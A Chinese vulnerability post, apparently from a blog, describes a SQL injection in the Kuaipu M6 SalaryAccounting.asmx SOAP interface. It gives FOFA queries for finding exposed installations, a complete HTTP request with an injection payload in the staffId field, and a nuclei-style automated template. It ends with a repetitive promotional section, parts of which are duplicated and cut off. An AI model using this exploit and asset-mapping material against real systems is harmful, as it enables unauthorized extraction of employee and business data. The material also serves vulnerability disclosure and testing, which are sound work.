快普M6SalaryAccounting接口存在SQL注入_salaryaccounting

---

0x01、概述

基本信息：

快普M6pro产品主要解决这些行业的集成管理、销售管理、运维管理、租赁管理、协同办公管理和供应链财务管理等管理需求，建立可持续发展的经营管理模式，彻底消除信息孤岛和管理死角。

漏洞描述：

快普M6 的  /WebService/HR/Salary/SalaryAccounting.asmx  接口处存在SQL注入漏洞，攻击者可以窃取用户的隐私信息、业务数据等，造成用户信息泄露、企业品牌受损、法律风险等相关安全问题。

0x02、资产测绘

FOFA：

body=“Resource/JavaScript/jKPM6.DateTime.js”
app=“快普-M6”

0x03、漏洞复现

3.1、抓包测试

POST请求包：

POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
Host: host
SOAPAction: http://tempuri.org/Calculate
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36
Content-Length: 636

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
 <soapenv:Header/>
 <soapenv:Body>
   <tem:Calculate>
    <!--type: string-->
    <tem:SalaryCategory></tem:SalaryCategory>
    <!--type: string-->
    <tem:StaffBirthDay></tem:StaffBirthDay>
    <!--type: string-->
    <tem:staffId> 1) and 1=@@version--+  </tem:staffId>
    <!--type: string-->
    <tem:Department></tem:Department>
    <!--type: string-->
    <tem:SubOrg></tem:SubOrg>
    <!--type: string-->
    <tem:taxMonthly></tem:taxMonthly>
   </tem:Calculate>
 </soapenv:Body>
</soapenv:Envelope>

测试截图

3.2、sqlmap测试

08984fb90631634f25f857c31bcf64d4.png

e9d9df42852049dda331a302345243dc.png

3.3、自动化脚本

id: kuaipu_vuln_sql

info:
  name: kuaipu_vuln_sql
  author: zq
  severity: high
  description: SalaryAccounting.asmx存在SQL注入漏洞
  metadata:
    max-request: 1


requests:
- raw:
  - |
    POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
    Host: {{Hostname}}
    SOAPAction: http://tempuri.org/Calculate
    Content-Type: text/xml;charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
     <soapenv:Header/>
     <soapenv:Body>
       <tem:Calculate>
        <!--type: string-->
        <tem:SalaryCategory></tem:SalaryCategory>
        <!--type: string-->
        <tem:StaffBirthDay></tem:StaffBirthDay>
        <!--type: string-->
        <tem:staffId>
        1) and 1=@@version--+</tem:staffId>
        <!--type: string-->
        <tem:Department></tem:Department>
        <!--type: string-->
        <tem:SubOrg></tem:SubOrg>
        <!--type: string-->
        <tem:taxMonthly></tem:taxMonthly>
       </tem:Calculate>
     </soapenv:Body>
    </soapenv:Envelope>


## 最后

**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/482e3ec98eb39c102723282c5d5e6db9.png)

![img](https://img-blog.csdnimg.cn/img_convert/8f985ca3439da0ee9ae174bad27f4008.png)

![img](https://img-blog.csdnimg.cn/img_convert/bea5d70c487e5b3c33740365f04bb0b8.png)

![img](https://img-blog.csdnimg.cn/img_convert/042a295392322da348559623b382a6a7.png)

![img](https://img-blog.csdnimg.cn/img_convert/5f62c7e7f39979d1de9c4eb4d47f05ad.png)

 

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！**

[**如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！**

网络安全知识点！真正的体系化！**

[**如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！**